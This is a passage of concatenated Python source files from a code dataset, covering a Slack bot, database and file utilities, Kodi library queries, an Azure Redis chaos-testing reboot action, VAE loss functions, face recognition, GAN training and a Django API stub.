command.startswith(FAM):\n\t\tresponse = \"Hello, fam.\"\n\n\tslack_client.api_call(\"chat.postMessage\", channel=channel,\n\t\t\t\t\t\t text=response, as_user=True)\n\ndef parse_slack_output(slack_rtm_output):\n\t\"\"\"\n\t\tThis method checks the slack RTM API to see if any of the messages\n\t\tare directed at this bot and acts accordingly.\n\t\"\"\"\n\toutput_list = slack_rtm_output\n\tif output_list and len(output_list) > 0:\n\t\tfor output in output_list:\n\t\t\tif output and 'text' in output and AT_BOT in output['text']:\n\t\t\t\t# return text after the @, trim whitespace\n\t\t\t\treturn output['text'].split(AT_BOT)[1].strip().lower(), \\\n\t\t\t\t output['channel']\n\treturn None, None\n\n# start it up\nif __name__ == \"__main__\":\n\tREAD_WEBSOCKET_DELAY = 1\n\tif slack_client.rtm_connect():\n\t\tprint(\"ticketbro is ticketbroing\")\n\t\twhile True:\n\t\t\tcommand, channel = parse_slack_output(slack_client.rtm_read())\n\t\t\tif command and channel:\n\t\t\t\thandle_command(command, channel)\n\t\t\ttime.sleep(READ_WEBSOCKET_DELAY)\n\telse:\n\t\tprint(\"he failed, bro. check yourself.\")","sub_path":"ticketbro.py","file_name":"ticketbro.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158901326","text":"from sqlalchemy.ext.declarative import DeclarativeMeta\nfrom sqlalchemy.orm.attributes import InstrumentedAttribute\n\nfrom common.cryptodome import AesCrypt\n\n\nclass ControllerBase(object):\n def __init__(self, table_cls):\n if isinstance(table_cls, DeclarativeMeta):\n table_cls = [table_cls]\n\n self.table_cls_map = {c.__tablename__: c\n for c in table_cls}\n self.table_cls_map.update({'default': table_cls[0]})\n self._session = None\n\n @staticmethod\n def format_return(success, msg='', info=None, **kwargs):\n if not isinstance(success, bool) or not isinstance(msg, str):\n raise Exception('format illegal.')\n ret = {'success': success, 'msg': msg, 'info': info}\n ret.update(kwargs)\n return ret\n\n def get_table_keys(self, table_name='default'):\n return [c for c, v in self.table_cls_map[table_name].__dict__.items()\n if isinstance(v, InstrumentedAttribute)]\n\n @property\n def session(self):\n return self._session\n\n @session.setter\n def session(self, session):\n self._session = session\n\n @session.getter\n def session(self):\n return self._session\n\n def commit(self):\n try:\n self.session.commit()\n except Exception as err:\n self.session.rollback()\n raise err\n finally:\n self.session.close()\n\n def _get(self, filter_dict, table_name='default', **kwargs):\n if not isinstance(filter_dict, dict):\n raise Exception('param filter is not dict.')\n filter_params = []\n for k, v in filter_dict.items():\n k_operator = k.split('.')\n if len(k_operator) == 2:\n k, operator = k_operator\n part_filter = getattr(getattr(self.table_cls_map[table_name], k), operator)(v)\n elif len(k_operator) == 1:\n k = k_operator[0]\n if k.startswith('^'):\n part_filter = getattr(self.table_cls_map[table_name], k) != v\n else:\n part_filter = getattr(self.table_cls_map[table_name], k) == v\n else:\n raise Exception('illegal key: [%s]' % k)\n\n filter_params.append(part_filter)\n\n query_obj = self._session.query(self.table_cls_map[table_name]).filter(*filter_params)\n query_method = kwargs.get('query_method', 'all')\n info = getattr(query_obj, query_method)()\n if isinstance(info, list):\n info = [i.serialize() for i in info]\n else:\n info = info.serialize() if info else None\n return info\n\n def _add(self, add_dict, table_name='default'):\n instance = self.table_cls_map[table_name](**add_dict)\n self._session.add(instance)\n return instance.serialize()\n\n def _update(self, query_dict, update_dict, table_name='default'):\n filter_params = [getattr(self.table_cls_map[table_name], k) == v\n for k, v in query_dict.items()]\n\n instance_list = self._session.query(\n self.table_cls_map[table_name]).filter(*filter_params).all()\n for instance in instance_list:\n for k, v in update_dict.items():\n setattr(instance, k, v)\n\n return [ins.serialize() for ins in instance_list]\n\n def _delete(self, query_dict, table_name='default'):\n filter_params = [getattr(self.table_cls_map[table_name], k) == v\n for k, v in query_dict.items()]\n\n self._session.query(self.table_cls_map[table_name]\n ).filter(*filter_params).delete()\n return True\n\n\n @staticmethod\n def encrypt(string, crypt_type='AES'):\n if crypt_type == 'AES':\n return AesCrypt().encrypt(string)\n else:\n raise Exception('crypt_type not supported')\n\n @staticmethod\n def decrypt(string, crypt_type='AES'):\n if crypt_type == 'AES':\n return AesCrypt().decrypt(string)\n else:\n raise Exception('crypt_type not supported')\n","sub_path":"my_project/controllers/base/base_controller.py","file_name":"base_controller.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22641710","text":"# Code inspired by this website:\n# https://www.tutorialspoint.com/python/python_binary_tree.htm\n\n# Can't use, exceeds Python's maximum recursion depth\n\n\nclass BinaryTreeNode:\n # Allows for a root node to be added to the tree, not required\n def __init__(self, pixel_id=None):\n self.data = pixel_id\n self.left = None\n self.right = None\n\n def insert_node(self, pixel_data):\n # Check if the node being inserted is the root node\n if self.data is None:\n self.data = pixel_data\n\n # The node being inserted will not be the root and will lie in one of the branches of the tree\n else:\n if pixel_data < self.data:\n if self.left is None:\n self.left = BinaryTreeNode(pixel_data)\n else:\n self.left.insert_node(pixel_data)\n elif pixel_data > self.data:\n if self.right is None:\n self.right = BinaryTreeNode(pixel_data)\n else:\n self.right.insert_node(pixel_data)\n\n # Debugging purposes\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n","sub_path":"tree_ops.py","file_name":"tree_ops.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48030015","text":"from mycroft.util.log import LOG\nimport requests\nimport json\n\n\ndef get_tv_show(kodi_path, show_title, season_number, episode_number):\n show_id = get_show(kodi_path, show_title)[0]['tvshowid']\n LOG.info('Found ShowID: ' + str(show_id))\n episode_details = get_episode(kodi_path, show_id, season_number, episode_number)\n print('Found Episode Details: ' + str(episode_details))\n return episode_details\n\n\ndef get_show(kodi_path, search_words):\n \"\"\"\n 1. need to confirm the TVShow (returns tvshowID)\n 2. Search for VideoLibrary.GetSeasons (uses Season number as integer)\n 3. Search for VideoLibrary.GetEpisodes (uses episode number as integer)\n \"\"\"\n filter_key = []\n for each_word in search_words:\n search_key = {\n \"field\": \"title\",\n \"operator\": \"contains\",\n \"value\": each_word.strip()\n }\n filter_key.append(search_key)\n # Make the request\n json_header = {'content-type': 'application/json'}\n method = \"VideoLibrary.GetTVShows\"\n kodi_payload = {\n \"jsonrpc\": \"2.0\",\n \"method\": method,\n \"id\": \"libTvShows\",\n \"params\": {\n \"properties\": [\n \"file\",\n \"thumbnail\",\n \"fanart\"\n ],\n \"filter\": {\n \"and\": filter_key\n }\n }\n }\n try:\n kodi_response = requests.post(kodi_path, data=json.dumps(kodi_payload), headers=json_header)\n item_list = json.loads(kodi_response.text)[\"result\"]['tvshows']\n # remove duplicates\n clean_list = [] # this is a dict\n for each_item in item_list:\n item_title = str(each_item['label'])\n info = {\n \"label\": each_item['label'],\n \"tvshowid\": each_item['tvshowid'],\n \"fanart\": each_item['fanart'],\n \"thumbnail\": each_item['thumbnail'],\n \"filename\": each_item['file']\n }\n if item_title.lower() not in str(clean_list).lower():\n clean_list.append(info)\n else:\n if len(each_item['label']) == len(item_title):\n print('Removing Duplicate Entries')\n else:\n clean_list.append(info)\n return clean_list # returns a dictionary of matched movies\n except Exception as e:\n print(e)\n return None\n\n\ndef get_episode(kodi_path, showID, seasonNum, episodeNum):\n \"\"\"\n 1. need to confirm the TVShow (returns tvshowID)\n 2. Search for VideoLibrary.GetSeasons (uses Season number as integer)\n 3. Search for VideoLibrary.GetEpisodes (uses episode number as integer)\n \"\"\"\n search_key = {\n \"field\": \"episode\",\n \"operator\": \"contains\",\n \"value\": int(episodeNum)\n }\n json_header = {'content-type': 'application/json'}\n method = \"VideoLibrary.GetEpisodes\"\n kodi_payload = {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": method,\n \"params\": {\n \"tvshowid\": showID,\n \"season\": seasonNum,\n \"properties\": [\n \"season\",\n \"episode\",\n \"file\",\n \"fanart\",\n \"thumbnail\",\n \"playcount\"\n ],\n }\n }\n try:\n kodi_response = requests.post(kodi_path, data=json.dumps(kodi_payload), headers=json_header)\n item_list = json.loads(kodi_response.text)[\"result\"][\"episodes\"]\n for each_item in item_list:\n if each_item[\"episode\"] == episodeNum:\n return each_item\n return None # returns a dictionary of matched movies\n except Exception as e:\n print(e)\n return None\n","sub_path":"kodi_tools/GetRequestedTVShows.py","file_name":"GetRequestedTVShows.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"542178328","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom azure.mgmt.redis import RedisManagementClient\nfrom chaoslib.exceptions import FailedActivity\nfrom chaoslib.types import Configuration, Secrets\nfrom logzero import logger\n\nfrom chaosazure import init_redis_client\nfrom chaosazure.common import cleanse\nfrom chaosazure.redis.constants import RES_TYPE_SRV_CACHE_REDIS\nfrom chaosazure.common.resources.graph import fetch_resources\n\n__all__ = [\"reboot_redis\"]\n\nfrom chaosazure.vmss.records import Records\n\n\ndef reboot_redis(filter: str = None,\n configuration: Configuration = None,\n secrets: Secrets = None):\n \"\"\"\n reboot_redis redis\n\n Parameters\n ----------\n filter : str, optional\n Filter the servers. If the filter is omitted all servers in\n the subscription will be selected as potential chaos candidates.\n\n Examples\n --------\n Some calling examples. Deep dive into the filter syntax:\n https://docs.microsoft.com/en-us/azure/kusto/query/\n\n \"\"\"\n logger.debug(\n \"Start stop_redis: \"\n \"configuration='{}', filter='{}'\".format(configuration, filter))\n\n servers = __fetch_redis(filter, configuration, secrets)\n client = __redis__mgmt_client(secrets, configuration)\n redis_records = Records()\n for s in servers:\n group = s['resourceGroup']\n name = s['name']\n logger.debug(\"Deleting server: {}\".format(name))\n client.redis.force_reboot(group, name)\n\n redis_records.add(cleanse.redis(s))\n\n return redis_records.output_as_dict('resources')\n\n\n###############################################################################\n# Private helper functions\n###############################################################################\ndef __fetch_redis(filter, configuration, secrets) -> []:\n servers = fetch_resources(filter, RES_TYPE_SRV_CACHE_REDIS, secrets, configuration)\n if not servers:\n logger.warning(\"No redis found\")\n raise FailedActivity(\"No redis found\")\n else:\n logger.debug(\n \"Fetched redis: {}\".format(\n [s['name'] for s in servers]))\n return servers\n\n\ndef __redis__mgmt_client(secrets, configuration):\n return init_redis_client(secrets, configuration)\n","sub_path":"chaosazure/redis/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"417724588","text":"import tensorflow as tf\r\nimport utils.codes as codes\r\nfrom utils.configuration import default_config as config\r\n\r\n## ------------------- LOSS: EXPECTED LOWER BOUND ----------------------\r\n# tsne_cost loss\r\ndef get_reconst_loss(x, x_recons, loss_func, epsilon=config.epsilon):\r\n \"\"\"\r\n Returns the reconstuction loss between x and x_recons\r\n two modes:\r\n OLS:\r\n MSE(x, x_recons) Mean error squared\r\n MLE:\r\n Maximum log-likelihood estimator is the expected log-likelihood of the lower bound. For this we use a bernouilli LL.\r\n \"\"\"\r\n assert loss_func in codes.properties(codes.Losses), \\\r\n 'Unsupported reconstuction loss loss_func'\r\n if loss_func == codes.Losses.MLE:\r\n return - tf.reduce_sum((x) * tf.log(x_recons + epsilon) +\r\n (1 - x) * tf.log(1 - x_recons + epsilon), 1)\r\n else:\r\n return tf.losses.mean_pairwise_squared_error(x, x_recons)\r\n\r\n\r\n### ---------------------------------------------- Divergences --------------------------------------------\r\n\r\n### ---------------------------------------------- Divergences --------------------------------------------\r\ndef get_self_divergence(meanQ, log_varQ, loss_func):\r\n log_varQ = 2.0*log_varQ\r\n P = tf.distributions.Bernoulli(probs=tf.ones(meanQ.shape[-1]))\r\n meanP = P.mean()\r\n log_varP = P.variance()\r\n return get_divergence(meanQ, log_varQ, meanP, log_varP, loss_func)\r\n\ndef get_QP_kl(meanQ, log_varQ, meanP, log_varP):\n \"\"\"\n KL[Q || P] returns the KL-divergence between the prior p and the variational posterior q.\n :param meanQ: vector of means for q\n :param log_varQ: vector of log-variances for q\n :param meanP: vector of means for p\n :param log_varP: vector of log-variances for p\n :return: KL divergence between q and p\n \"\"\"\n #meanQ = posterior_mean\n #log_varQ = posterior_logvar\n #meanP = prior_mean\n #log_varP = prior_logvar\n\n return - 0.5 * tf.reduce_sum(\n log_varP - log_varQ + (tf.square(meanQ - meanP) / tf.exp(log_varP)) + tf.exp(log_varQ - log_varP) - 1)\n\n\r\n\r\ndef get_divergence(meanQ, log_varQ, meanP, log_varP, div_loss):\r\n assert div_loss in codes.properties(codes.Losses)\\\r\n , 'Unsupported divergences loss div_loss'\r\n if div_loss == codes.Losses.KLD:\r\n return get_KL_div(meanQ, log_varQ, meanP, log_varP)\r\n\r\n elif div_loss == codes.Losses.RKLD:\r\n return -get_KL_div(meanP, log_varP, meanQ, log_varQ)\r\n\r\n elif div_loss == codes.Losses.JS:\r\n return get_KL_div(meanQ, log_varQ, meanP, log_varP) * 0.5 + \\\r\n get_KL_div(meanP, log_varP, meanQ, log_varQ) * 0.5\r\n\r\n elif div_loss == codes.Losses.CHI2:\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(meanQ - meanP) / tf.log(log_varP)-1)**2\r\n - tf.exp(log_varQ - log_varP)**2 , 1)\r\n\r\n elif div_loss == codes.Losses.Helling:\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(tf.square(meanQ - meanP) / tf.log(log_varP))-1)**2\r\n - tf.exp(log_varQ - log_varP)**2 , 1)\r\n\r\n\r\ndef get_kl(mu, log_var):\r\n \"\"\"\r\n d_kl(q(latent|x)||p(latent)) returns the KL-divergence between the prior p and the variational posterior q.\r\n :return: KL divergence between q and p\r\n \"\"\"\r\n # Formula: 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\r\n return - 0.5 * tf.reduce_sum( 1.0 + 2.0 * log_var - tf.square(mu) - tf.exp(2.0 * log_var), 1)\r\n\r\ndef get_KL_div(meanQ, log_varQ, meanP, log_varP):\r\n \"\"\"\r\n KL[Q || P] returns the divergence between the prior p and the variational posterior q.\r\n :param meanQ: vector of means for q\r\n :param log_varQ: vector of log-variances for q\r\n :param meanP: vector of means for p\r\n :param log_varP: vector of log-variances for p\r\n :return: KL divergence between q and p\r\n \"\"\"\r\n #meanQ = posterior_mean\r\n #log_varQ = posterior_logvar\r\n #meanP = prior_mean\r\n #log_varP = prior_logvar\r\n\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(meanQ - meanP) / tf.exp(log_varP))\r\n - tf.exp(log_varQ - log_varP) , 1)\r\n\r\ndef kl_divergence(P, Q, epsilon=config.epsilon):\r\n \"\"\"\r\n Compute the Kullback–Leibler divergence between two probability distributions\r\n Args:\r\n P : (tensorflow.placeholder): Tensor storing the target probability distribution\r\n @ : (tensorflow.Variable): Tensor storing the model distribution\r\n Returns:\r\n KLD (tensorflow.Variable): Kullback–Leibler divergence\r\n \"\"\"\r\n Pc = tf.maximum(P, epsilon)\r\n Qc = tf.maximum(Q, epsilon)\r\n\r\n return tf.reduce_sum(P * tf.log(Pc / Qc))\r\n\r\n\r\ndef get_distributions_div_cost(Px, Qx, loss_func, epsilon=config.epsilon):\r\n\r\n assert loss_func in codes.properties(codes.Losses),\\\r\n 'Unsupported divergences loss loss_func'\r\n\r\n if loss_func == codes.Losses.KLD:\r\n return kl_divergence(Px, Qx)\r\n\r\n if loss_func == codes.Losses.RKLD:\r\n return -kl_divergence(Qx, Px)\r\n\r\n elif loss_func == codes.Losses.JS:\r\n return kl_divergence(Px, Qx) * 0.5 + \\\r\n kl_divergence(Qx, Px) * 0.5\r\n\r\n elif loss_func == codes.Losses.CHI2:\r\n Pxc = tf.maximum(Px, epsilon)\r\n Qyc = tf.maximum(Qx, epsilon)\r\n return tf.reduce_sum(Qx * (Pxc / Qyc - 1.) ** 2)\r\n\r\n elif loss_func == codes.Losses.Helling:\r\n Pxc = tf.maximum(Px, epsilon)\r\n Qyc = tf.maximum(Qx, epsilon)\r\n return tf.reduce_sum(Qx * (tf.sqrt(Pxc / Qyc) - 1.) ** 2)\r\n","sub_path":"bases/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"328121009","text":"from sys import argv\n\nscript, name1 = argv\nprompt = '>'\nprint('Hi {0}, i am inside the script {1}'.format(name1, script))\nprint('i would like to ask few questions')\nprint('Do you like me {0}'.format(name1))\nlikes = input(prompt)\nprint('Where do you leave {0}'.format(name1))\nleave = input(prompt)\nprint('What is the name of your computer ?')\ncomputer = input(prompt)\nprint(\"\"\"\nAlright {0},now i understand that\nyou leave in {1} and like {2}.\nAlso i could see that your computer is {3}\n\"\"\".format(name1, likes, leave, computer))\n","sub_path":"ShaW/Part_1/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9527343","text":"import json\nimport os\nimport re\n#def filenames_to_im_ids( fns ):\n#\treturn [ filename_to_id(fn) for fn in fns ]\n\n#def filename_to_id( fn ):\n#\treturn fn.split('_')[0]\nimport numpy as np\n\n\ndef filenames_to_im_ids( im_files ):\n\tif isinstance(im_files[0], int):\n\t\treturn im_files\n\telif im_files[0].startswith('frame'):\n\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0].split('_')[1] ) for f in im_files ]\n\t\treturn im_file_ids\n\n\ttry:\n\t\tint(im_files[0])\n\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0] ) for f in im_files ]\n\t\n\texcept ValueError:\n\t\t'''\n\t\t# just return these as strings? not sure why i wanted to do the conversion\n\t\tim_file_ids = [os.path.splitext(os.path.basename(f))[0] for f in im_files]\n\t\t\n\t\t'''\n\t\tif '_' in im_files[0]:\n\t\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0].split('_')[0] ) for f in im_files ]\n\t\telse:\n\t\t\tim_file_ids = im_files[:]\n\t\t\tfor i,f in enumerate(im_files):\n\t\t\t\tcurr_str = []\n\t\t\t\tfirst_seg = os.path.splitext(os.path.basename(f))[0].replace('_','') # TODO: check this for all naming formats we use\n\t\t\t\tfor c in first_seg:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcurr_str.append( str(int(c)))\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tcurr_str.append( str(ord(c)))\n\t\t\t\tim_file_ids[i] = int(''.join(curr_str))\n\t#\t\tim_file_ids = [ ''.join([str(ord(c)) for c in ]) for f in im_files ]\n\t#\t\tprint(im_file_ids)\n\treturn im_file_ids\n\n\ndef make_output_dirs(base_model_name, prompt_delete=True, exp_root ='./experiments/'):\n\tfig_root = './figures/'\n\tlog_root = './logs/'\n\tmodel_root = './models/'\n\n\texperiment_dir = exp_root + base_model_name\n\n\tfigures_dir = exp_root + base_model_name + '/figures'\n\tlogs_dir = exp_root + base_model_name + '/logs'\n\tmodels_dir = exp_root + base_model_name + '/models'\n\n\tmodel_name = base_model_name\n\tcopy_count = 0\n\n\twhile os.path.isdir(figures_dir) or os.path.isdir(logs_dir) or os.path.isdir(models_dir):\n\t\t# list existing files\n\t\tif os.path.isdir(figures_dir):\n\t\t\tfigure_files = [os.path.join(figures_dir, f) for f in os.listdir(figures_dir) if\n\t\t\t\t\t\t\tf.endswith('.jpg') or f.endswith('.png')]\n\t\telse:\n\t\t\tfigure_files = []\n\n\t\tif os.path.isdir(logs_dir):\n\t\t\tlog_files = [os.path.join(logs_dir, l) for l in os.listdir(logs_dir) \\\n\t\t\t\t\t\t if os.path.isfile(os.path.join(logs_dir, l))] \\\n\t\t\t\t\t\t+ [os.path.join(experiment_dir, f) for f in os.listdir(experiment_dir) if f.endswith('.log')]\n\t\t\t# also includde any .log files\n\t\telse:\n\t\t\tlog_files = []\n\n\t\tif os.path.isdir(models_dir):\n\t\t\tmodel_files = [os.path.join(models_dir, m) for m in os.listdir(models_dir) \\\n\t\t\t\t\t\t if os.path.isfile(os.path.join(models_dir, m))]\n\t\telse:\n\t\t\tmodel_files = []\n\n\t\tif prompt_delete and (len(figure_files) > 0 or len(log_files) > 0 or len(model_files) > 0):\n\t\t\tprint(\n\t\t\t\t'Remove \\n\\t{} figures from {}\\n\\t{} logs from {}\\n\\t{} models from {}?\\n[y]es / [n]o (create new folder) / [C]ontinue existing / remove [m]odels too: [y/n/C/m]'.format(\n\t\t\t\t\tlen(figure_files), figures_dir, len(log_files), logs_dir, len(model_files), models_dir))\n\n\t\t\ttry:\n\t\t\t\tchoice = raw_input().lower()\n\t\t\texcept NameError:\n\t\t\t\t# python 3 syntax\n\t\t\t\tchoice = input().lower()\n\n\t\t\t#\t\t\tif len(choice) == 0:\n\t\t\t#\t\t\t\tchoice=['yes']\n\t\t\tremove_choices = ['yes', 'y', 'ye']\n\t\t\tmake_new_choices = ['no', 'n']\n\t\t\tcontinue_choices = ['c', '']\n\t\t\tremove_models_too = ['m']\n\n\t\t\t#\t\t\tfor c in choice:\n\t\t\tif choice in remove_choices:\n\t\t\t\tfor f in figure_files + log_files:\n\t\t\t\t\tprint('Removing {}'.format(f))\n\t\t\t\t\tos.remove(f)\n\t\t\telif choice in remove_models_too:\n\t\t\t\tfor f in figure_files + log_files + model_files:\n\t\t\t\t\tprint('Removing {}'.format(f))\n\t\t\t\t\tos.remove(f)\n\t\t\telif choice in continue_choices:\n\t\t\t\tprint('Continuing in existing folder...')\n\t\t\t\tbreak\n\n\t\t\telif choice in make_new_choices:\n\t\t\t\tcopy_count += 1\n\t\t\t\tmodel_name = base_model_name + '_{}'.format(copy_count)\n\t\t\t\texperiment_dir = exp_root + model_name\n\n\t\t\t\tfigures_dir = exp_root + model_name + '/figures'\n\t\t\t\tlogs_dir = exp_root + model_name + '/logs'\n\t\t\t\tmodels_dir = exp_root + model_name + '/models'\n\t\telse:\n\t\t\tbreak\n\n\tif not os.path.isdir(experiment_dir):\n\t\tos.mkdir(experiment_dir)\n\tif not os.path.isdir(figures_dir):\n\t\tos.mkdir(figures_dir)\n\tif not os.path.isdir(logs_dir):\n\t\tos.mkdir(logs_dir)\n\tif not os.path.isdir(models_dir):\n\t\tos.mkdir(models_dir)\n\treturn model_name, experiment_dir, figures_dir, logs_dir, models_dir\n\ndef _test_make_output_dirs():\n\tmodel_name = '_test_make_output_dirs'\n\tnew_model_name, figures_dir, logs_dir, models_dir = make_output_dirs(model_name)\n\tassert new_model_name == model_name\n\tassert os.path.isdir( figures_dir )\n\tassert os.path.isdir( logs_dir )\n\tassert os.path.isdir( models_dir )\n\n\ndef get_latest_epoch_in_dir( d, match_prefixes = [] ):\n\tmodel_files = [ f for f in os.listdir(d) if f.endswith('.h5') ]\n\n\tepoch_nums = [ re.search( '(?<=epoch)[0-9]*', os.path.basename(f) ).group(0) for f in model_files ]\n\tepoch_nums = list(set([ int(n) for n in epoch_nums if n is not None and n is not '']))\n\tmax_epoch_num = 0\n\n\tif len(epoch_nums) == 0:\n\t\treturn None\n\n\tif len(match_prefixes) > 0:\n\t\tfor n in reversed(epoch_nums):\n\t\t\tcurr_filenames = [os.path.basename(f) for f in model_files if 'epoch{}'.format(n) in f ]\n\t\t\tif np.all( [ np.any( [p in f for f in curr_filenames]) for p in match_prefixes] ) and n > max_epoch_num:\n\t\t\t\tmax_epoch_num = n\n\telse:\n#\t\telif len(match_prefixes) == 0 and n>max_epoch_nums\n#\t\t\tepoch_nums = [ re.search( '(?<=epoch)[0-9]*', os.path.basename(f) ).group(0) for f in model_files if ]\n\n\t\t\tmax_epoch_num = max(epoch_nums)\n\treturn max_epoch_num\n\n\ndef load_params_from_dir(in_dir):\n\twith open(os.path.join(in_dir, 'arch_params.json'), 'r') as f:\n\t\tarch_params = json.load(f)\n\twith open(os.path.join(in_dir, 'data_params.json'), 'r') as f:\n\t\tdata_params = json.load(f)\n\treturn arch_params, data_params\n","sub_path":"file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11912948","text":"import face_recognition\nimport cv2\nimport os\nimport pickle\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nNames = []\nEncodings = []\nknownFaces = '/home/kiranjoy/pyPro/face_recog/demoImages/known/'\nfor file in os.listdir(knownFaces):\n Names.append(file[:-4])\n image = face_recognition.load_image_file(os.path.join(knownFaces, file))\n Encodings.append(face_recognition.face_encodings(image)[0])\n\nwith open('train.pkl', 'wb') as f:\n pickle.dump(Names, f)\n pickle.dump(Encodings, f)\n\nNames = []\nEncodings = []\n\nwith open('train.pkl', 'rb') as f:\n Names = pickle.load(f)\n Encodings = pickle.load(f)\n\n\nunKnownFaces = '/home/kiranjoy/pyPro/face_recog/demoImages/unknown/'\nfor file in os.listdir(unKnownFaces):\n\n testImage = face_recognition.load_image_file(\n os.path.join(unKnownFaces, file))\n\n facePositions = face_recognition.face_locations(testImage)\n allEncodings = face_recognition.face_encodings(testImage, facePositions)\n\n testImage = cv2.cvtColor(testImage, cv2.COLOR_RGB2BGR)\n\n for Pos, face_encoding in zip(facePositions, allEncodings):\n name = 'unknown'\n (top, right, bottom, left) = Pos\n matches = face_recognition.compare_faces(Encodings, face_encoding)\n if True in matches:\n first_match_index = matches.index(True)\n name = Names[first_match_index]\n cv2.rectangle(testImage, (left, top), (right, bottom), (0, 0, 255), 2)\n cv2.putText(testImage, name, (left, top-6),\n font, .75, (255, 0, 255), 2)\n cv2.imshow('frame', testImage)\n if cv2.waitKey(0) == ord('q'):\n cv2.destroyAllWindows()\n break\n","sub_path":"face_recog/face-2.py","file_name":"face-2.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490936874","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom generators import GeneratorSN\nfrom discriminators import DiscriminatorSN\nfrom utils import ContentLoss, TVLoss\n\n\nclass OnewayGAN:\n\n def __init__(self, image_size):\n\n self.generator = GeneratorSN().cuda()\n self.discriminator = DiscriminatorSN(image_size, num_input_channels=3).cuda()\n\n self.content_criterion = ContentLoss().cuda()\n self.tv_criterion = TVLoss().cuda()\n self.realism_criterion = nn.BCEWithLogitsLoss().cuda()\n\n betas = (0.0, 0.9)\n self.g_optimizer = optim.Adam(self.generator.parameters(), lr=1e-4, betas=betas)\n self.d_optimizer = optim.Adam(self.discriminator.parameters(), lr=4e-4, betas=betas)\n\n def train_step(self, x, y, update_generator=True):\n\n for p in self.discriminator.parameters():\n p.requires_grad = False\n\n y_fake = self.generator(x)\n content_loss = self.content_criterion(x, y_fake)\n tv_loss = self.tv_criterion(y_fake)\n\n batch_size = x.size(0)\n pos_labels = torch.ones(batch_size, dtype=torch.float, device=x.device)\n neg_labels = torch.zeros(batch_size, dtype=torch.float, device=x.device)\n realism_generation_loss = self.realism_criterion(self.discriminator(y_fake), pos_labels)\n\n if update_generator:\n\n generator_loss = content_loss + 100.0 * tv_loss\n generator_loss += 5e-2 * realism_generation_loss\n\n self.g_optimizer.zero_grad()\n generator_loss.backward()\n self.g_optimizer.step()\n\n for p in self.discriminator.parameters():\n p.requires_grad = True\n\n targets = torch.cat([pos_labels, neg_labels], dim=0)\n is_real_real = self.discriminator(y)\n is_fake_real = self.discriminator(y_fake.detach())\n logits = torch.cat([is_real_real, is_fake_real], dim=0)\n discriminator_loss = self.realism_criterion(logits, targets)\n\n self.d_optimizer.zero_grad()\n discriminator_loss.backward()\n self.d_optimizer.step()\n\n loss_dict = {\n 'content': content_loss.item(),\n 'tv': tv_loss.item(),\n 'realism_generation': realism_generation_loss.item(),\n 'discriminator': discriminator_loss.item(),\n }\n return loss_dict\n\n def save_model(self, model_path):\n torch.save(self.generator.state_dict(), model_path + '_generator.pth')\n torch.save(self.discriminator.state_dict(), model_path + '_discriminator.pth')\n","sub_path":"oneway_gan.py","file_name":"oneway_gan.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281503271","text":"from . import models\nimport base64\nfrom django.conf.urls.static import static\nimport os\nfrom dateutil.parser import parse\n \nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.status import *\nimport json\nimport requests\n\ncount_requests = [0]\ncrash_flag = False\n#user_service_ip = \"http://localhost:8080\"\n\ndef dt_tm(dt, s2o=None, o2s=None):\n\tprint(dt)\n\tif s2o == True:\n\t\tdt = dt[:10]+\" \"+dt[17:19]+\":\"+dt[14:16]+\":\"+dt[11:13]\n\t\tprint(dt)\n\t\treturn parse(dt)\n\tif o2s == True:\n\t\treturn dt.strftime(\"%d-%m-%Y:%S-%M-%H\")\n\n\n\n@api_view(['GET', 'POST'])\ndef ListAll_Add_Category(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tif request.method == \"GET\":\n\t\t\tprint(\"\\nListAllCategory :\", request.data, \"\\n\")\n\n\t\t\tod = dict()\n\t\t\tfor i in models.category.objects.all():\n\t\t\t\tod[i.categoryName] = i.categoryCount\n\t\t\t\t\n\t\t\tif len(od) == 0:\n\t\t\t\treturn Response({}, status=HTTP_204_NO_CONTENT)\n\t\t\t\t\n\t\t\treturn Response(od, 